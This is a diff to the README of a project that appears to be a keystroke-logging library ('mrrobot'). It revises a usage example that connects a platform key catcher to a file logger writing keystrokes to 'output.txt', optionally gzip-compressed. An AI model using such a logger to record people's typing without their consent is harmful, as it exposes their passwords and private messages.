AlfioEmanueleFresta/mrrobot/README.md

 from mrrobot.logger import FileLogger

-# A file logger that writes to 'output.txt' every 8 characters.
+# A file logger that writes to 'output.txt' every 32 key strokes (default buffer_size).
-# Obviously, you may want to increase the buffer size.
-# With a very large buffer size, you can also use compress=True and a .gz filename.
+# If your filename ends in '.gz', e.g. 'output.txt.gz', it will be compressed using gzip.
-l = FileLogger(filename="output.txt",
+l = FileLogger(filename="output.txt")
-               buffer_size=8)

 # Get our platform's keys catcher, and connect it to our logger.
 c = Catcher(logger=l)